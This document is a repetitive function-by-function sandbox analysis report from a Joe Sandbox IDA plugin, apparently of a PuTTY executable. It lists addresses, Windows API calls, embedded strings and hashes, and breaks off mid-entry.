Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: DeleteMenu$Message
String ID: %s Error$Unable to open connection to%s%s$Unable to open terminal:%s
API String ID: 1035315089-2786405544
Opcode ID: ea54a67460f1d850973e00eb1ca3c380d3dd5cfe45bc3e3923d15a5b01bd8c22
Instruction ID: 9595be7ca40c6a3aee53ea7411044ae5fea3f4e3c21571c01d77d245128dadbf
Opcode Fuzzy Hash: ea54a67460f1d850973e00eb1ca3c380d3dd5cfe45bc3e3923d15a5b01bd8c22
Instruction Fuzzy Hash: D941867D990700BBD7112F60BC07F293E65EB56709F084024FB48D63B3E5722968ABB6

Uniqueness

Uniqueness Score: -1.00%

Function 00CDF290 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00CDF2C7
___except_validate_context_record.LIBVCRUNTIME ref: 00CDF2CF
_ValidateLocalCookies.LIBCMT ref: 00CDF358
__IsNonwritableInCurrentImage.LIBCMT ref: 00CDF383
_ValidateLocalCookies.LIBCMT ref: 00CDF3D8

Strings

csm, xrefs: 00CDF36D

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3376e10c445b013eea0ea2ecdd8bf7daab5d79d79deb07940019b56b64893a47
Instruction ID: d0523b11b9bfe391d300cf4de66dfd4e68af054eedae2f1b897af9d5630f9487
Opcode Fuzzy Hash: 3376e10c445b013eea0ea2ecdd8bf7daab5d79d79deb07940019b56b64893a47
Instruction Fuzzy Hash: A7410C34A002089FCF10DF69C890A9EBBB5FF45314F14806AEE169B362D731DE16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C9A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00C7C870: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432EC), ref: 00C7C8ED
Part of subcall function 00C7C870: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432F0), ref: 00C7C91C
Part of subcall function 00C7C870: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D432F0), ref: 00C7C926

GetCurrentProcess.KERNEL32 ref: 00C7CA82
GetLastError.KERNEL32 ref: 00C7CABC
LocalFree.KERNEL32(?), ref: 00C7CAE3

Strings

Could not restrict process ACL: %s, xrefs: 00C7CAEA
Unable to set process ACL: %s, xrefs: 00C7CAB7, 00C7CACC
unable to construct ACL: %s, xrefs: 00C7CA65

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
API String ID: 4156538165-2118130043
Opcode ID: 5406df18fefdec91f2de13e0468e08cad4a823591ff3c8817cdca30658591faf
Instruction ID: 9b656ab29a7cc4c56c9db46064dcd431015ce5d85f325a18ef9a27caeb58954f
Opcode Fuzzy Hash: 5406df18fefdec91f2de13e0468e08cad4a823591ff3c8817cdca30658591faf
Instruction Fuzzy Hash: 963184B56083019FE310DF24D88AB1BBBE8AF95758F04491DF588DB390D3B69904DFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(?,40000003,00000008,000000FF,00001000,00001000,00000000), ref: 00CCF803
ConnectNamedPipe.KERNEL32(?,00000010), ref: 00CCF81A
GetLastError.KERNEL32 ref: 00CCF824
CloseHandle.KERNEL32(?), ref: 00CCF866

Strings

Error while listening to named pipe: %s, xrefs: 00CCF883

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateErrorHandleLast
String ID: Error while listening to named pipe: %s
API String ID: 3669627233-1472817922
Opcode ID: 15043924e618f1d8b990159793d590684d7af08067b3acffc87453acf571c072
Instruction ID: a3c003dcb2c8c22d3e0d9d08a3869b695795d159b6a2243024142b84621510c3
Opcode Fuzzy Hash: 15043924e618f1d8b990159793d590684d7af08067b3acffc87453acf571c072
Instruction Fuzzy Hash: 2A31B4B0600300AFE3206B25EC45F2777AAEF89364F14893CF59AC72D1D771E9519A62

Uniqueness

Uniqueness Score: -1.00%

Function 00C42030 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00C42670
GetCursorPos.USER32(?), ref: 00C42682
IsZoomed.USER32 ref: 00C426F5
GetWindowLongA.USER32(000000F0), ref: 00C42707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00C4273D

Strings

(, xrefs: 00C426AA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: 354e638c9d2d674c3abe45071edd2eb9f318e3f207cee46001af4bdd29432d06
Instruction ID: 20941629ae0c3d274b9eba96024356d12531e1b79d5e61fa2a0b0ae3805bc617
Opcode Fuzzy Hash: 354e638c9d2d674c3abe45071edd2eb9f318e3f207cee46001af4bdd29432d06
Instruction Fuzzy Hash: 6D21C7756083009FE7209F24EC8ABAA7BE5FB41300F84882CF295C62A1DB759944EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C41FFE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00C42670
GetCursorPos.USER32(?), ref: 00C42682
IsZoomed.USER32 ref: 00C426F5
GetWindowLongA.USER32(000000F0), ref: 00C42707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00C4273D

Strings

(, xrefs: 00C426AA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: 99be4993f2fb602acea44a2156017e0811a62ca0c5501b77ea7fb3402b087434
Instruction ID: 2abdb457f917e5b3ca67173e91a8fd839f8dcff1113fc948e29c7a1e09d22aab
Opcode Fuzzy Hash: 99be4993f2fb602acea44a2156017e0811a62ca0c5501b77ea7fb3402b087434
Instruction Fuzzy Hash: 2921C4756083009FD7209F24EC4ABE97BE5FB41310F84882CF695C62A1DBB5D944EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C42016 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00C42670
GetCursorPos.USER32(?), ref: 00C42682
IsZoomed.USER32 ref: 00C426F5
GetWindowLongA.USER32(000000F0), ref: 00C42707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00C4273D

Strings

(, xrefs: 00C426AA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: cfeb06ab7657e394946628cc93eb47083161d39b9a0d89f92adce38f84475a5c
Instruction ID: 42aa52cafe2ecb35ab0a19628efc19693b9c191f77074429db9bb5ffb4da20f2
Opcode Fuzzy Hash: cfeb06ab7657e394946628cc93eb47083161d39b9a0d89f92adce38f84475a5c
Instruction Fuzzy Hash: 2021C4756083409FE7209F24EC4ABE97BE5FB41310F84882CF695C62E1CBB59984EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C41ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00C42670
GetCursorPos.USER32(?), ref: 00C42682
IsZoomed.USER32 ref: 00C426F5
GetWindowLongA.USER32(000000F0), ref: 00C42707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00C4273D

Strings

(, xrefs: 00C426AA

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: 2490fb7731a0060edf2f7e1e492f6aac200f445741bb05fbfd77b88b505d919f
Instruction ID: 4cc6f9409b89799676769099b8e512ea92c769ace6341e8f63ba7d48e222741d
Opcode Fuzzy Hash: 2490fb7731a0060edf2f7e1e492f6aac200f445741bb05fbfd77b88b505d919f
Instruction Fuzzy Hash: 9B21C7756083009FE7209F24EC4ABA97BE5FB41310F84882CF295C62E1DBB5D944EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C8ABA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00C8ABB2
_strcspn.LIBCMT ref: 00C8ABCA

Part of subcall function 00C7EA00: _strlen.LIBCMT ref: 00C7EA0B

_strlen.LIBCMT ref: 00C8AC2D

Strings

SSHCONNECTION@putty.projects.tartarus.org-2.0-, xrefs: 00C8AC1D
!cs->sent_verstring, xrefs: 00C8AC75
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/ssh/sharing.c, xrefs: 00C8AC70

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _strcspn_strlen
String ID: !cs->sent_verstring$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/ssh/sharing.c$SSHCONNECTION@putty.projects.tartarus.org-2.0-
API String ID: 2927111553-2302181561
Opcode ID: d20c706cac2eb418e5efbf90fae50e377d8c328e1519c3676b916137cb17b819
Instruction ID: c777b026a1bc7cdc15d613b9b80cba0448408c5e940393ceaec5e555e4a88131
Opcode Fuzzy Hash: d20c706cac2eb418e5efbf90fae50e377d8c328e1519c3676b916137cb17b819
Instruction Fuzzy Hash: 832129B29003407FE7216A30AC46F663B94AB41718F090624FC1A562C2F767AD58D3B3

Uniqueness

Uniqueness Score: -1.00%

Function 00CF32E9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00CF33F6,?,?,?,00000000,?,?,00CF2DFA,00000021,FlsSetValue,00D1A978,00D1A980,?), ref: 00CF33AA

Strings

api-ms-, xrefs: 00CF3340
ext-ms-, xrefs: 00CF3354

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 6ed32e3ab82125d9ce2433fee297132d06b1b9a1e32c7ea4ce92f1d39927068a
Instruction ID: 0c3e30258e0b3ea08ed9a0ca978fddd0ec12bc780ed1839f5229eebc973e588c
Opcode Fuzzy Hash: 6ed32e3ab82125d9ce2433fee297132d06b1b9a1e32c7ea4ce92f1d39927068a
Instruction Fuzzy Hash: D321D532A01359BBDB61DB25EC48A6E3769EB41760F150110EA15E72A0DB70EF06CAF2

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF2E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(?,00000000,?), ref: 00CCF34F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 00CCF35E
GetLastError.KERNEL32(?,00000000,?), ref: 00CCF366

Part of subcall function 00C7CEE0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00C76C0E,?), ref: 00C7CF6B
Part of subcall function 00C7CEE0: _strlen.LIBCMT ref: 00C7CF76

LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00CA828B,00000000,?), ref: 00CCF391
LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00CA828B,00000000,?), ref: 00CCF3A0

Part of subcall function 00C7C6D0: LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00C7C79D
Part of subcall function 00C7C6D0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00C7C7AD
Part of subcall function 00C7C6D0: SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00C7C7C2
Part of subcall function 00C7C6D0: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00C7C7D5

Strings

CreateMutex("%s") failed: %s, xrefs: 00CCF377

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait_strlen
String ID: CreateMutex("%s") failed: %s
API String ID: 3757897666-2623464464
Opcode ID: a1b9af9de833c2b71b2613b9c1a4f4a71a015a29bb0773b74c6dd8e17633b53c
Instruction ID: 215f0544738aedf1b60344fbc3aed9ea5b8785a0e4f443c7c26c3198f46e9940
Opcode Fuzzy Hash: a1b9af9de833c2b71b2613b9c1a4f4a71a015a29bb0773b74c6dd8e17633b53c
Instruction Fuzzy Hash: 59219DB1A04301AFD710EF64EC49B2B7BE9AB84764F09491CF894D7391D730D9098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C46870 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32(00000040,00000000), ref: 00C46925
InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00C4693E
DeleteMenu.USER32(00000040,00000000), ref: 00C4694A
InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00C4695D

Strings

%s (inactive), xrefs: 00C4687F
&Restart Session, xrefs: 00C4692D, 00C4694C

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Menu$DeleteInsert
String ID: %s (inactive)$&Restart Session
API String ID: 985044671-219138112
Opcode ID: 3bf9733df63ee9447aa34d1048c69c320bbd305a0b67da22889db9c2f2dd2d17
Instruction ID: cb6d7b417cbb52b66782b1a4b23903ebf43ad373465b2ec5d805fb0bbe6ac366
Opcode Fuzzy Hash: 3bf9733df63ee9447aa34d1048c69c320bbd305a0b67da22889db9c2f2dd2d17
Instruction Fuzzy Hash: 7F218EBD680310AFE720AFA5FC06F463FA4EB52705F144020F609EA3E1D6B5A459CB79

Uniqueness

Uniqueness Score: -1.00%

Function 00C4AA20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(000000F0), ref: 00C4AA2A
SetWindowLongA.USER32(000000F0,?), ref: 00C4AA89
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027,?,?,?,00C42DC0,?,?,?), ref: 00C4AAA1
CheckMenuItem.USER32(00000180,00000000), ref: 00C4AABA
CheckMenuItem.USER32(00000180,00000000), ref: 00C4AAC9

Strings

MZx, xrefs: 00C4AA52

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Window$CheckItemLongMenu
String ID: MZx
API String ID: 730651012-2575928145
Opcode ID: b27f4dae29b492c8a15ee24e468cffb4f38dacf116354b63aecb08bdfc42f5ba
Instruction ID: 21aa7cbbde6e0e8dfe02a667eefc9f0b52478a73b3397277d3818ae5903d5a27
Opcode Fuzzy Hash: b27f4dae29b492c8a15ee24e468cffb4f38dacf116354b63aecb08bdfc42f5ba
Instruction Fuzzy Hash: D601627A694714BBDB112F14FC06F283E22E746761F254224F755E63F1CA7128119FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6760 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00CA67AE
EnterCriticalSection.KERNEL32(00D433E0), ref: 00CA67BC
LeaveCriticalSection.KERNEL32(00D433E0), ref: 00CA67DE
SetEvent.KERNEL32(?), ref: 00CA67F8

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/handle-io.c, xrefs: 00CA6775
h && !h->u.g.moribund, xrefs: 00CA677A

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CriticalSection$CloseEnterEventHandleLeave
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/handle-io.c$h && !h->u.g.moribund
API String ID: 1836394787-3436955946
Opcode ID: f4abdc31e50a0e35e2c1d525d8953c54b1bf723b5ada58e75f048322007cb250
Instruction ID: 8abe8d0f4ae071d87451a6e3456f9eb1b141dcb51e73ba015bb7a5de9f7f29e7
Opcode Fuzzy Hash: f4abdc31e50a0e35e2c1d525d8953c54b1bf723b5ada58e75f048322007cb250
Instruction Fuzzy Hash: C2119E71510B419FC7318F25E808A52BFF0FF45718F08892DE49B82AA0D3B0B948CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C466E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F02), ref: 00C469AA
SetClassLongA.USER32(000000F4,00000000), ref: 00C469BB
SetCursor.USER32(00000000), ref: 00C469C2
ShowCursor.USER32(00000000), ref: 00C469D4

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C469E8
false && "Bad busy_status", xrefs: 00C469ED

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Cursor$ClassLoadLongShow
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$false && "Bad busy_status"
API String ID: 1160125251-1710739289
Opcode ID: f77342de646f2ec0e6a17c8f365e77b2534eb4501be1d475fbc8413ccba6a80a
Instruction ID: 0f0742347b6ac43470c2dae33c5acf78aa13814f02c63c3e2964f49c0a2e4e54
Opcode Fuzzy Hash: f77342de646f2ec0e6a17c8f365e77b2534eb4501be1d475fbc8413ccba6a80a
Instruction Fuzzy Hash: 39012BF8558381AFEB056B74FC0AA363A95F713351F044115F546C13A0C7A48944DB32

Uniqueness

Uniqueness Score: -1.00%

Function 00C47180 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(0000000F), ref: 00C47196
SelectPalette.GDI32(?,00000000,00000000), ref: 00C471A0
ReleaseDC.USER32(?), ref: 00C471AD

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C471C4, 00C471EA
wintw_hdc, xrefs: 00C471C9
wgs.term_hwnd, xrefs: 00C471EF

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ObjectPaletteReleaseSelectStock
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$wgs.term_hwnd$wintw_hdc
API String ID: 3714893027-2709120206
Opcode ID: 99a8ed1da29b6135dc9af6eb052ebcb6cbefb3d32bcd5991eb9ef7de7588eb91
Instruction ID: 67f2c3fb8c788c9d3216e18926d307e33767e5e50885cf58efc31adb2ea58f2d
